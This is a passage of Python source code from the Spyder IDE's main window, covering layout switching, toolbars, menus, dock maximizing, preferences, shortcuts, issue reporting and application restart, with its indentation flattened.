# widget.updateGeometry()
# fix column height
for c, column in enumerate(widgets_layout):
for r in range(len(column) - 1):
widget = column[r][0]
dockwidget = widget.dockwidget
dock_min_h = dockwidget.minimumHeight()
dock_max_h = dockwidget.maximumHeight()
info = {'widget': widget,
'dock min height': dock_min_h,
'dock max height': dock_max_h}
self._layout_widget_info.append(info)
# The 0.95 factor is to adjust height based on usefull
# estimated area in the window
new_height = int(layout['height fraction'][c][r]*height*0.95)
dockwidget.setMinimumHeight(new_height)
dockwidget.setMaximumHeight(new_height)
self._custom_layout_timer = QTimer(self)
self._custom_layout_timer.timeout.connect(self.layout_fix_timer)
self._custom_layout_timer.setSingleShot(True)
self._custom_layout_timer.start(5000)
def layout_fix_timer(self):
"""Fixes the height of docks after a new layout is set."""
info = self._layout_widget_info
for i in info:
dockwidget = i['widget'].dockwidget
if 'dock min width' in i:
dockwidget.setMinimumWidth(i['dock min width'])
dockwidget.setMaximumWidth(i['dock max width'])
if 'dock min height' in i:
dockwidget.setMinimumHeight(i['dock min height'])
dockwidget.setMaximumHeight(i['dock max height'])
dockwidget.updateGeometry()
self.setUpdatesEnabled(True)
@Slot()
def toggle_previous_layout(self):
""" """
self.toggle_layout('previous')
@Slot()
def toggle_next_layout(self):
""" """
self.toggle_layout('next')
def toggle_layout(self, direction='next'):
""" """
get = CONF.get
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
if len(active) == 0:
return
layout_index = ['default']
for name in order:
if name in active:
layout_index.append(names.index(name))
current_layout = self.current_quick_layout
dic = {'next': 1, 'previous': -1}
if current_layout is None:
# Start from default
current_layout = 'default'
if current_layout in layout_index:
current_index = layout_index.index(current_layout)
else:
current_index = 0
new_index = (current_index + dic[direction]) % len(layout_index)
self.quick_layout_switch(layout_index[new_index])
def quick_layout_set_menu(self):
""" """
get = CONF.get
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
ql_actions = []
ql_actions = [create_action(self, _('Spyder Default Layout'),
triggered=lambda:
self.quick_layout_switch('default'))]
for name in order:
if name in active:
index = names.index(name)
# closure required so lambda works with the default parameter
def trigger(i=index, self=self):
return lambda: self.quick_layout_switch(i)
qli_act = create_action(self, name, triggered=trigger())
# closure above replaces the following which stopped working
# qli_act = create_action(self, name, triggered=lambda i=index:
# self.quick_layout_switch(i)
ql_actions += [qli_act]
self.ql_save = create_action(self, _("Save current layout"),
triggered=lambda:
self.quick_layout_save(),
context=Qt.ApplicationShortcut)
self.ql_preferences = create_action(self, _("Layout preferences"),
triggered=lambda:
self.quick_layout_settings(),
context=Qt.ApplicationShortcut)
self.ql_reset = create_action(self, _('Reset to spyder default'),
triggered=self.reset_window_layout)
self.register_shortcut(self.ql_save, "_", "Save current layout")
self.register_shortcut(self.ql_preferences, "_", "Layout preferences")
ql_actions += [None]
ql_actions += [self.ql_save, self.ql_preferences, self.ql_reset]
self.quick_layout_menu.clear()
add_actions(self.quick_layout_menu, ql_actions)
if len(order) == 0:
self.ql_preferences.setEnabled(False)
else:
self.ql_preferences.setEnabled(True)
@Slot()
def reset_window_layout(self):
"""Reset window layout to default"""
answer = QMessageBox.warning(self, _("Warning"),
_("Window layout will be reset to default settings: "
"this affects window position, size and dockwidgets.\n"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.setup_layout(default=True)
def quick_layout_save(self):
"""Save layout dialog"""
get = CONF.get
set_ = CONF.set
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
dlg = self.dialog_layout_save(self, names)
if dlg.exec_():
name = dlg.combo_box.currentText()
if name in names:
answer = QMessageBox.warning(self, _("Warning"),
_("Layout <b>%s</b> will be \
overwritten. Do you want to \
continue?") % name,
QMessageBox.Yes | QMessageBox.No)
index = order.index(name)
else:
answer = True
if None in names:
index = names.index(None)
names[index] = name
else:
index = len(names)
names.append(name)
order.append(name)
# Always make active a new layout even if it overwrites an inactive
# layout
if name not in active:
active.append(name)
if answer:
self.save_current_window_settings('layout_{}/'.format(index),
section='quick_layouts')
set_('quick_layouts', 'names', names)
set_('quick_layouts', 'order', order)
set_('quick_layouts', 'active', active)
self.quick_layout_set_menu()
def quick_layout_settings(self):
"""Layout settings dialog"""
get = CONF.get
set_ = CONF.set
section = 'quick_layouts'
names = get(section, 'names')
order = get(section, 'order')
active = get(section, 'active')
dlg = self.dialog_layout_settings(self, names, order, active)
if dlg.exec_():
set_(section, 'names', dlg.names)
set_(section, 'order', dlg.order)
set_(section, 'active', dlg.active)
self.quick_layout_set_menu()
def quick_layout_switch(self, index):
"""Switch to quick layout number *index*"""
section = 'quick_layouts'
try:
settings = self.load_window_settings('layout_{}/'.format(index),
section=section)
(hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen) = settings
# The defaults layouts will always be regenerated unless there was
# an overwrite, either by rewriting with same name, or by deleting
# and then creating a new one
if hexstate is None:
# The value for hexstate shouldn't be None for a custom saved
# layout (ie, where the index is greater than the number of
# defaults). See issue 6202.
if index != 'default' and index >= self.DEFAULT_LAYOUTS:
QMessageBox.critical(
self, _("Warning"),
_("Error opening the custom layout. Please close"
" Spyder and try again. If the issue persists,"
" then you must use 'Reset to Spyder default' "
"from the layout menu."))
return
self.setup_default_layouts(index, settings)
except cp.NoOptionError:
QMessageBox.critical(self, _("Warning"),
_("Quick switch layout #%s has not yet "
"been defined.") % str(index))
return
# TODO: is there any real use in calling the previous layout
# setting?
# self.previous_layout_settings = self.get_window_settings()
self.set_window_settings(*settings)
self.current_quick_layout = index
# make sure the flags are correctly set for visible panes
for plugin in self.widgetlist:
action = plugin.toggle_view_action
action.setChecked(plugin.dockwidget.isVisible())
# --- Show/Hide toolbars
def _update_show_toolbars_action(self):
"""Update the text displayed in the menu entry."""
if self.toolbars_visible:
text = _("Hide toolbars")
tip = _("Hide toolbars")
else:
text = _("Show toolbars")
tip = _("Show toolbars")
self.show_toolbars_action.setText(text)
self.show_toolbars_action.setToolTip(tip)
def save_visible_toolbars(self):
"""Saves the name of the visible toolbars in the .ini file."""
toolbars = []
for toolbar in self.visible_toolbars:
toolbars.append(toolbar.objectName())
CONF.set('main', 'last_visible_toolbars', toolbars)
def get_visible_toolbars(self):
"""Collects the visible toolbars."""
toolbars = []
for toolbar in self.toolbarslist:
if toolbar.toggleViewAction().isChecked():
toolbars.append(toolbar)
self.visible_toolbars = toolbars
def load_last_visible_toolbars(self):
"""Loads the last visible toolbars from the .ini file."""
toolbars_names = CONF.get('main', 'last_visible_toolbars', default=[])
if toolbars_names:
dic = {}
for toolbar in self.toolbarslist:
dic[toolbar.objectName()] = toolbar
toolbars = []
for name in toolbars_names:
if name in dic:
toolbars.append(dic[name])
self.visible_toolbars = toolbars
else:
self.get_visible_toolbars()
self._update_show_toolbars_action()
@Slot()
def show_toolbars(self):
"""Show/Hides toolbars."""
value = not self.toolbars_visible
CONF.set('main', 'toolbars_visible', value)
if value:
self.save_visible_toolbars()
else:
self.get_visible_toolbars()
for toolbar in self.visible_toolbars:
toolbar.toggleViewAction().setChecked(value)
toolbar.setVisible(value)
self.toolbars_visible = value
self._update_show_toolbars_action()
# --- Other
def valid_project(self):
"""Handle an invalid active project."""
if bool(self.projects.get_active_project_path()):
path = self.projects.get_active_project_path()
if not self.projects.is_valid_project(path):
if path:
QMessageBox.critical(
self,
_('Error'),
_("<b>{}</b> is no longer a valid Spyder project! "
"Since it is the current active project, it will "
"be closed automatically.").format(path))
self.projects.close_project()
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu"""
for element in getattr(self, menu + '_menu_actions'):
if element and isinstance(element, QAction):
if element._shown_shortcut is not None:
element.setShortcut(element._shown_shortcut)
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu"""
for element in getattr(self, menu + '_menu_actions'):
if element and isinstance(element, QAction):
if element._shown_shortcut is not None:
element.setShortcut(QKeySequence())
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
widget = QApplication.focusWidget()
from spyder.widgets.shell import ShellBaseWidget
from spyder.widgets.editor import TextEditBaseWidget
from spyder.widgets.ipythonconsole import ControlWidget
# if focused widget isn't valid try the last focused
if not isinstance(widget, (ShellBaseWidget, TextEditBaseWidget,
ControlWidget)):
widget = self.previous_focused_widget
textedit_properties = None
if isinstance(widget, (ShellBaseWidget, TextEditBaseWidget,
ControlWidget)):
console = isinstance(widget, (ShellBaseWidget, ControlWidget))
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
#!!! Below this line, widget is expected to be a QPlainTextEdit instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if not console and not_readonly and not self.editor.is_file_opened():
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
self.undo_action.setEnabled( readwrite_editor \
and widget.document().isUndoAvailable() )
self.redo_action.setEnabled( readwrite_editor \
and widget.document().isRedoAvailable() )
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
if self.menuBar().hasFocus():
return
widget, textedit_properties = self.get_focus_widget_properties()
for action in self.editor.search_menu_actions:
try:
action.setEnabled(self.editor.isAncestorOf(widget))
except RuntimeError:
pass
if textedit_properties is None: # widget is not an editor/console
return
#!!! Below this line, widget is expected to be a QPlainTextEdit instance
_x, _y, readwrite_editor = textedit_properties
# Disable the replace action for read-only files
self.search_menu_actions[3].setEnabled(readwrite_editor)
def create_plugins_menu(self):
order = ['editor', 'console', 'ipython_console', 'variable_explorer',
'help', None, 'explorer', 'outline_explorer',
'project_explorer', 'find_in_files', None, 'historylog',
'profiler', 'breakpoints', 'pylint', None,
'onlinehelp', 'internal_console']
for plugin in self.widgetlist:
action = plugin.toggle_view_action
action.setChecked(plugin.dockwidget.isVisible())
try:
name = plugin.CONF_SECTION
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
actions = order[:]
for action in order:
if type(action) is str:
actions.remove(action)
self.plugins_menu_actions = actions
add_actions(self.plugins_menu, actions)
def create_toolbars_menu(self):
order = ['file_toolbar', 'run_toolbar', 'debug_toolbar',
'main_toolbar', 'Global working directory', None,
'search_toolbar', 'edit_toolbar', 'source_toolbar']
for toolbar in self.toolbarslist:
action = toolbar.toggleViewAction()
name = toolbar.objectName()
try:
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
add_actions(self.toolbars_menu, order)
def createPopupMenu(self):
menu = QMenu('', self)
actions = self.help_menu_actions[:3] + \
[None, self.help_menu_actions[-1]]
add_actions(menu, actions)
return menu
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
self.debug_print(message)
self.splash.show()
self.splash.showMessage(message, Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute, QColor(Qt.black))
QApplication.processEvents()
def remove_tmpdir(self):
"""Remove Spyder temporary directory"""
if CONF.get('main', 'single_instance') and not self.new_instance:
shutil.rmtree(programs.TEMPDIR, ignore_errors=True)
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in self.widgetlist:
if plugin.isAncestorOf(self.last_focused_widget):
plugin.visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
prefix = 'window' + '/'
self.save_current_window_settings(prefix)
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
for plugin in self.thirdparty_plugins:
if not plugin.closing_plugin(cancelable):
return False
for widget in self.widgetlist:
if not widget.closing_plugin(cancelable):
return False
self.dialog_manager.close_all()
if self.toolbars_visible:
self.save_visible_toolbars()
self.already_closed = True
return True
def add_dockwidget(self, child):
"""Add QDockWidget and toggleViewAction"""
dockwidget, location = child.create_dockwidget()
if CONF.get('main', 'vertical_dockwidget_titlebars'):
dockwidget.setFeatures(dockwidget.features()|
QDockWidget.DockWidgetVerticalTitleBar)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(child)
@Slot()
def close_current_dockwidget(self):
widget = QApplication.focusWidget()
for plugin in self.widgetlist:
if plugin.isAncestorOf(widget):
plugin.dockwidget.hide()
break
def toggle_lock_dockwidgets(self, value):
"""Lock/Unlock dockwidgets"""
self.dockwidgets_locked = value
self.apply_panes_settings()
CONF.set('main', 'panes_locked', value)
def __update_maximize_action(self):
if self.state_before_maximizing is None:
text = _("Maximize current pane")
tip = _("Maximize current pane")
icon = ima.icon('maximize')
else:
text = _("Restore current pane")
tip = _("Restore pane to its original size")
icon = ima.icon('unmaximize')
self.maximize_action.setText(text)
self.maximize_action.setIcon(icon)
self.maximize_action.setToolTip(tip)
@Slot()
@Slot(bool)
def maximize_dockwidget(self, restore=False):
"""Shortcut: Ctrl+Alt+Shift+M
First call: maximize current dockwidget
Second call (or restore=True): restore original window layout"""
if self.state_before_maximizing is None:
if restore:
return
# Select plugin to maximize
self.state_before_maximizing = self.saveState()
focus_widget = QApplication.focusWidget()
for plugin in self.widgetlist:
plugin.dockwidget.hide()
if plugin.isAncestorOf(focus_widget):
self.last_plugin = plugin
# Only plugins that have a dockwidget are part of widgetlist,
# so last_plugin can be None after the above "for" cycle.
# For example, this happens if, after Spyder has started, focus
# is set to the Working directory toolbar (which doesn't have
# a dockwidget) and then you press the Maximize button
if self.last_plugin is None:
# Using the Editor as default plugin to maximize
self.last_plugin = self.editor
# Maximize last_plugin
self.last_plugin.dockwidget.toggleViewAction().setDisabled(True)
self.setCentralWidget(self.last_plugin)
self.last_plugin.ismaximized = True
# Workaround to solve an issue with editor's outline explorer:
# (otherwise the whole plugin is hidden and so is the outline explorer
# and the latter won't be refreshed if not visible)
self.last_plugin.show()
self.last_plugin.visibility_changed(True)
if self.last_plugin is self.editor:
# Automatically show the outline if the editor was maximized:
self.addDockWidget(Qt.RightDockWidgetArea,
self.outlineexplorer.dockwidget)
self.outlineexplorer.dockwidget.show()
else:
# Restore original layout (before maximizing current dockwidget)
self.last_plugin.dockwidget.setWidget(self.last_plugin)
self.last_plugin.dockwidget.toggleViewAction().setEnabled(True)
self.setCentralWidget(None)
self.last_plugin.ismaximized = False
self.restoreState(self.state_before_maximizing)
self.state_before_maximizing = None
self.last_plugin.get_focus_widget().setFocus()
self.__update_maximize_action()
def __update_fullscreen_action(self):
if self.isFullScreen():
icon = ima.icon('window_nofullscreen')
else:
icon = ima.icon('window_fullscreen')
if is_text_string(icon):
icon = get_icon(icon)
self.fullscreen_action.setIcon(icon)
@Slot()
def toggle_fullscreen(self):
if self.isFullScreen():
self.fullscreen_flag = False
self.showNormal()
if self.maximized_flag:
self.showMaximized()
else:
self.maximized_flag = self.isMaximized()
self.fullscreen_flag = True
self.showFullScreen()
self.__update_fullscreen_action()
def add_to_toolbar(self, toolbar, widget):
"""Add widget actions to toolbar"""
actions = widget.toolbar_actions
if actions is not None:
add_actions(toolbar, actions)
@Slot()
def about(self):
"""About Spyder"""
versions = get_versions()
# Show Mercurial revision for development version
revlink = ''
if versions['revision']:
rev = versions['revision']
revlink = " (<a href='https://github.com/spyder-ide/spyder/"\
"commit/%s'>Commit: %s</a>)" % (rev, rev)
QMessageBox.about(self,
_("About %s") % "Spyder",
"""<b>Spyder %s</b> %s
<br>The Scientific PYthon Development EnviRonment
<br>Copyright © The Spyder Project Contributors
<br>Licensed under the terms of the MIT License
<p>Created by Pierre Raybaut.
<br>Developed and maintained by the
<a href="%s/blob/master/AUTHORS">Spyder Project Contributors</a>.
<br>Many thanks to all the Spyder beta testers and regular users.
<p>For help with Spyder errors and crashes, please read our
<a href="%s">Troubleshooting page</a>, and for bug reports and
feature requests, visit our <a href="%s">Github website</a>.
For project discussion, see our <a href="%s">Google Group</a>.
<p>This project is part of a larger effort to promote and
facilitate the use of Python for scientific and engineering
software development. The popular Python distributions
<a href="http://continuum.io/downloads">Anaconda</a>,
<a href="https://winpython.github.io/">WinPython</a> and
<a href="http://python-xy.github.io/">Python(x,y)</a>
also contribute to this plan.
<p>Python %s %dbits, Qt %s, %s %s on %s
<p><small>Most of the icons for the Spyder 2 theme come from the Crystal
Project (© 2006-2007 Everaldo Coelho). Other icons for that
theme come from <a href="http://p.yusukekamiyamane.com/"> Yusuke
Kamiyamane</a> (all rights reserved) and from
<a href="http://www.oxygen-icons.org/">
The Oxygen icon theme</a></small>.
"""
% (versions['spyder'], revlink, __project_url__, __trouble_url__,
__project_url__, __forum_url__, versions['python'],
versions['bitness'], versions['qt'], versions['qt_api'],
versions['qt_api_ver'], versions['system']))
@Slot()
def show_dependencies(self):
"""Show Spyder's Dependencies dialog box"""
from spyder.widgets.dependencies import DependenciesDialog
dlg = DependenciesDialog(None)
dlg.set_data(dependencies.DEPENDENCIES)
dlg.exec_()
def render_issue(self, description='', traceback=''):
"""Render issue before sending it to Github"""
# Get component versions
versions = get_versions()
# Get git revision for development version
revision = ''
if versions['revision']:
revision = versions['revision']
# Make a description header in case no description is supplied
if not description:
description = "### What steps reproduce the problem?"
# Make error section from traceback and add appropriate reminder header
if traceback:
error_section = ("### Traceback\n"
"```python-traceback\n"
"{}\n"
"```".format(traceback))
else:
error_section = ''
issue_template = """\
## Description
{description}
{error_section}
## Versions
* Spyder version: {spyder_version} {commit}
* Python version: {python_version}
* Qt version: {qt_version}
* {qt_api_name} version: {qt_api_version}
* Operating System: {os_name} {os_version}
### Dependencies
```
{dependencies}
```
""".format(description=description,
error_section=error_section,
spyder_version=versions['spyder'],
commit=revision,
python_version=versions['python'],
qt_version=versions['qt'],
qt_api_name=versions['qt_api'],
qt_api_version=versions['qt_api_ver'],
os_name=versions['system'],
os_version=versions['release'],
dependencies=dependencies.status())
return issue_template
@Slot()
def report_issue(self, body=None, title=None, open_webpage=False):
"""Report a Spyder issue to github, generating body text if needed."""
if body is None:
from spyder.widgets.reporterror import SpyderErrorDialog
report_dlg = SpyderErrorDialog(self, is_report=True)
report_dlg.show()
else:
if open_webpage:
if PY3:
from urllib.parse import quote
else:
from urllib import quote # analysis:ignore
from qtpy.QtCore import QUrlQuery
url = QUrl(__project_url__ + '/issues/new')
query = QUrlQuery()
query.addQueryItem("body", quote(body))
if title:
query.addQueryItem("title", quote(title))
url.setQuery(query)
QDesktopServices.openUrl(url)
@Slot()
def trouble_guide(self):
"""Open Spyder troubleshooting guide in a web browser."""
url = QUrl(__trouble_url__)
QDesktopServices.openUrl(url)
@Slot()
def google_group(self):
"""Open Spyder Google Group in a web browser."""
url = QUrl(__forum_url__)
QDesktopServices.openUrl(url)
@Slot()
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.widgets.editor import TextEditBaseWidget
# If focused widget isn't valid try the last focused
if not isinstance(widget, TextEditBaseWidget):
widget = self.previous_focused_widget
if isinstance(widget, TextEditBaseWidget):
getattr(widget, callback)()
def redirect_internalshell_stdio(self, state):
if state:
self.console.shell.interpreter.redirect_stds()
else:
self.console.shell.interpreter.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def execute_in_external_console(self, lines, focus_to_editor):
"""
Execute lines in IPython console and eventually set focus
to the Editor.
"""
console = self.ipyconsole
console.visibility_changed(True)
console.raise_()
console.execute_code(lines)
if focus_to_editor:
self.editor.visibility_changed(True)
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if encoding.is_text_file(fname):
self.editor.load(fname)
elif self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif not external:
fname = file_uri(fname)
programs.start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
fname = encoding.to_unicode_from_fs(fname)
if osp.isfile(fname):
self.open_file(fname, external=True)
elif osp.isfile(osp.join(CWD, fname)):
self.open_file(osp.join(CWD, fname), external=True)
# ---- PYTHONPATH management, etc.
def get_spyder_pythonpath(self):
"""Return Spyder PYTHONPATH"""
active_path = [p for p in self.path if p not in self.not_active_path]
return active_path + self.project_path
def add_path_to_sys_path(self):
"""Add Spyder path to sys.path"""
for path in reversed(self.get_spyder_pythonpath()):
sys.path.insert(1, path)
def remove_path_from_sys_path(self):
"""Remove Spyder path from sys.path"""
for path in self.path + self.project_path:
while path in sys.path:
sys.path.remove(path)
@Slot()
def path_manager_callback(self):
"""Spyder path manager"""
from spyder.widgets.pathmanager import PathManager
self.remove_path_from_sys_path()
project_path = self.projects.get_pythonpath()
dialog = PathManager(self, self.path, project_path,
self.not_active_path, sync=True)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.exec_()
self.add_path_to_sys_path()
try:
encoding.writelines(self.path, self.SPYDER_PATH) # Saving path
encoding.writelines(self.not_active_path,
self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError:
pass
self.sig_pythonpath_changed.emit()
def pythonpath_changed(self):
"""Projects PYTHONPATH contribution has changed"""
self.remove_path_from_sys_path()
self.project_path = self.projects.get_pythonpath()
self.add_path_to_sys_path()
self.sig_pythonpath_changed.emit()
@Slot()
def win_env(self):
"""Show Windows current user environment variables"""
self.dialog_manager.show(WinUserEnvDialog(self))
#---- Preferences
def apply_settings(self):
"""Apply settings changed in 'Preferences' dialog box"""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes Issue 2036
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
else:
style_name = CONF.get('main', 'windows_style',
self.default_style)
style = QStyleFactory.create(style_name)
if style is not None:
style.setProperty('name', style_name)
qapp.setStyle(style)
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
if CONF.get('main', 'animated_docks'):
default = default|QMainWindow.AnimatedDocks
self.setDockOptions(default)
self.apply_panes_settings()
self.apply_statusbar_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings"""
# Update toggle action on menu
for child in self.widgetlist:
features = child.FEATURES
if CONF.get('main', 'vertical_dockwidget_titlebars'):
features = features | QDockWidget.DockWidgetVerticalTitleBar
if not self.dockwidgets_locked:
features = features | QDockWidget.DockWidgetMovable
child.dockwidget.setFeatures(features)
child.update_margins()
def apply_statusbar_settings(self):
"""Update status bar widgets settings"""
show_status_bar = CONF.get('main', 'show_status_bar')
self.statusBar().setVisible(show_status_bar)
if show_status_bar:
for widget, name in ((self.mem_status, 'memory_usage'),
(self.cpu_status, 'cpu_usage')):
if widget is not None:
widget.setVisible(CONF.get('main', '%s/enable' % name))
widget.set_interval(CONF.get('main', '%s/timeout' % name))
else:
return
@Slot()
def edit_preferences(self):
"""Edit Spyder preferences"""
from spyder.plugins.configdialog import ConfigDialog
dlg = ConfigDialog(self)
dlg.size_change.connect(self.set_prefs_size)
if self.prefs_dialog_size is not None:
dlg.resize(self.prefs_dialog_size)
for PrefPageClass in self.general_prefs:
widget = PrefPageClass(dlg, main=self)
widget.initialize()
dlg.add_page(widget)
for plugin in [self.workingdirectory, self.editor,
self.projects, self.ipyconsole,
self.historylog, self.help, self.variableexplorer,
self.onlinehelp, self.explorer, self.findinfiles
]+self.thirdparty_plugins:
if plugin is not None:
try:
widget = plugin.create_configwidget(dlg)
if widget is not None:
dlg.add_page(widget)
except Exception:
traceback.print_exc(file=sys.stderr)
if self.prefs_index is not None:
dlg.set_current_index(self.prefs_index)
dlg.show()
dlg.check_all_settings()
dlg.pages_widget.currentChanged.connect(self.__preference_page_changed)
dlg.exec_()
def __preference_page_changed(self, index):
"""Preference page index has changed"""
self.prefs_index = index
def set_prefs_size(self, size):
"""Save preferences dialog size"""
self.prefs_dialog_size = size
#---- Shortcuts
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_sc_to_tip=False):
"""
Register QAction or QShortcut to Spyder main application,
with shortcut (context, name, default)
"""
self.shortcut_data.append( (qaction_or_qshortcut, context,
name, add_sc_to_tip) )
def apply_shortcuts(self):
"""Apply shortcuts settings to all widgets/plugins"""
toberemoved = []
for index, (qobject, context, name,
add_sc_to_tip) in enumerate(self.shortcut_data):
keyseq = QKeySequence( get_shortcut(context, name) )
try:
if isinstance(qobject, QAction):
if sys.platform == 'darwin' and \
qobject._shown_shortcut == 'missing':
qobject._shown_shortcut = keyseq
else:
qobject.setShortcut(keyseq)
if add_sc_to_tip:
add_shortcut_to_tooltip(qobject, context, name)
elif isinstance(qobject, QShortcut):
qobject.setKey(keyseq)
except RuntimeError:
# Object has been deleted
toberemoved.append(index)
for index in sorted(toberemoved, reverse=True):
self.shortcut_data.pop(index)
@Slot()
def show_shortcuts_dialog(self):
from spyder.widgets.shortcutssummary import ShortcutsSummaryDialog
dlg = ShortcutsSummaryDialog(None)
dlg.exec_()
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
while 1: # 1 is faster than True
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See Issue 1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
Quit and reset Spyder and then Restart application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False):
"""
Quit and Restart Spyder application.
If reset True it allows to reset spyder on restart.
"""
# Get start path to use in restart script
spyder_start_directory = get_module_path('spyder')
restart_script = osp.join(spyder_start_directory, 'app', 'restart.py')
# Get any initial argument passed when spyder was started
# Note: Variables defined in bootstrap.py and spyder/app/start.py
env = os.environ.copy()
bootstrap_args = env.pop('SPYDER_BOOTSTRAP_ARGS', None)
spyder_args = env.pop('SPYDER_ARGS')
# Get current process and python running spyder
pid = os.getpid()
python = sys.executable
# Check if started with bootstrap.py
if bootstrap_args is not None:
spyder_args = bootstrap_args
is_bootstrap = True
else:
is_bootstrap = False
# Pass variables as environment variables (str) to restarter subprocess
env['SPYDER_ARGS'] = spyder_args
env['SPYDER_PID'] = str(pid)
env['SPYDER_IS_BOOTSTRAP'] = str(is_bootstrap)
env['SPYDER_RESET'] = str(reset)
if DEV:
if os.name == 'nt':
env['PYTHONPATH'] = ';'.join(sys.path)
else:
env['PYTHONPATH'] = ':'.join(sys.path)
# Build the command and popen arguments depending on the OS
if os.name == 'nt':
# Hide flashing command prompt
startupinfo = subprocess.STARTUPINFO()
